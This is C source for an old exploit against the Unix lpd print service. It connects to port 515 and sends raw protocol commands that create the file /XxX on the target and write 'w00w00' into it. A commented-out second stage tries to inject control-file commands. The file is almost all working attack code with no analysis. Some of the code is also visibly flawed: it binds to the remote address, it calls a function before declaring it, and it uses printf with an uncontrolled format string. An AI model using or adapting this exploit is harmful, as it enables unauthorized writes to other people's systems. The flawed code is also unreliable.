/* This can only create files...not greater than 5 chars  */
/* Host has to be in hosts.lpd, and has to be run as root */
/* (because lpd checks to make sure it's running on a     */
/* privileged port. It needs to be in hosts.lpd because   */
/* lpd checks first. The use of this? Well not much right */
/* now. You would use this on a trusted system.           */
/* BiT                                                    */

#include <stdio.h>
#include <signal.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/time.h>
#include <errno.h>

#define ERROR -1

void read_soc(int sock);
void read_key(int sock);

void phand(int s)
{
  return;
}

void ihand(int s)
{
  printf("SIGINT caught, exiting...\n");
  exit(4);
}

void dome()
{
  return;
}

void banner(char *wee)
{
  exit(1);
}

void main(int argc, char **argv)
{
  int    i, a, s;
  long   val;
  fd_set blockme;

  char   buf[1500];
  char   username[1024 + 255];
  
  if (argc != 2) {
     fprintf(stderr, "Usage: %s <host>\n", argv[0]);
     exit(1);
  }

  s = wee(argv[1], 515);

  sprintf(buf, "%clp\n", '\2');
  if (write(s, buf, strlen(buf)) == ERROR) {
	perror("write");
	close(s);
	exit(ERROR);
  }

  sprintf(buf, "%c5 /XxX\n", '\2'); /* Creates /XxX           */
  if (write(s, buf, strlen(buf)) == ERROR) {
	perror("write");
	close(s);
	exit(ERROR);
  }

  sprintf(buf, "w00w00");            /* Writes "w00w00" to file */
  if (write(s, buf, strlen(buf) + 1) == ERROR) {
	perror("write");
	close(s);
	exit(ERROR);
  }

  sleep(5);
  close(s);
  
/*  wee(argv[1], 515);
  sprintf(buf, "%clp\n", '\2');
  if (write(s, buf, strlen(buf)) == ERROR) {
	perror("write");
	close(s);
	exit(ERROR);
  }

  sprintf(buf, "%c12 a@s\n", '\2');
  if (write(s, buf, strlen(buf)) == ERROR) {
	perror("write");
	close(s);
	exit(ERROR);
  }

  sprintf(buf, "H s\nP -Ca\nM\n");
  if (write(s, buf, strlen(buf) + 1) == ERROR) {
	perror("write");
	close(s);
	exit(ERROR);
  }

  close(s); */

}

void read_soc(int sock)
{
  static char sbuf[512];
  static int  i = 0;
  char        c, j;
  
  j = read(sock, &c, 1);
  if(j < 1 && errno != EAGAIN) {
    fprintf(stderr, "Connection dropped.\n");
    exit(3);
  }

  if(i > 510) c='\n';
  if(c == '\n') {
    sbuf[i++] = c, sbuf[i] = 0, i = 0;
    printf(sbuf);
  } else
    sbuf[i++]=c;
}

void read_key(int sock)
{
  static char kbuf[512];
  static int  i = 0;
  char        c, j;
  
  j=read(0, &c, 1);
  if(i > 510)
    c = '\n';

  if(c == '\n') {
        kbuf[i++] = c, kbuf[i] = 0, i = 0;
        write(sock, kbuf, strlen(kbuf));
  } else
	kbuf[i++] = c;
}

int wee(char *host, int port)
{
  int  sock;
  struct sockaddr_in s;
  struct hostent     *he;

  he = gethostbyname(host);
  if(he == NULL) {
    herror("gethostbyname");
    return -1;
  }

  if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == ERROR) {
	perror("socket");
	exit(ERROR);
  }

  s.sin_family      = AF_INET;
  s.sin_port        = htons(1005);
  s.sin_addr.s_addr = INADDR_ANY;
  s.sin_port        = htons(port);
  memcpy(&s.sin_addr, he->h_addr, he->h_length);

  if (bind(sock, (struct sockaddr *)&s, sizeof(s)) == ERROR) {
	perror("bind");
	exit(ERROR);
  }

  if(connect(sock, (struct sockaddr *)&s, sizeof(s)) < 0) {
        perror("connect");
        return -1;
  }

  if (fcntl(sock, F_SETFL, O_NONBLOCK) == ERROR)
	perror("fcntl");

  return sock;
}
